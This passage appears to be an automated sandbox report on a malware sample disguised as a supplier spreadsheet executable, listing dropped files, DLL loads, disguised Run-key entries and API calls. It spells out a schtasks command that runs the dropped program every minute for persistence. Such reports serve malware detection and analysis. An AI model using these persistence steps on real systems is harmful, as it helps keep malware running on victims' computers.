                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                                Source: ZMNYQK.lnk.2.drLNK file: ..\..\..\..\..\Windata\DELPQB.exe
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\doeVwij.iniJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                                Source: Supplier 0202AW-PER2 Sheet.exeStatic file information: File size 1685504 > 1048576
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00ED20B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00ED20B0
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00E005A8 push ss; ret 2_2_00E005A9
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D97795 push ecx; ret 2_2_00D977A8
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_021B45BC pushad ; ret 3_2_021B45D5
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_009805A8 push ss; ret 9_2_009805A9
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00917795 push ecx; ret 9_2_009177A8
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1

                                Persistence and Installation Behavior

                                barindex
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile created: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeJump to dropped file
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeFile created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeJump to dropped file
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile created: C:\ProgramData\Synaptics\RCXC902.tmpJump to dropped file
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile created: C:\ProgramData\Synaptics\RCXC902.tmpJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file

                                Boot Survival

                                barindex
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZMNYQK.lnkJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZMNYQK.lnkJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZMNYQKJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZMNYQKJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D8F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00D8F78E
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DD7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00DD7F0E
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0090F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,9_2_0090F78E
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00957F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,9_2_00957F0E
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D91E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00D91E5A
                                Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
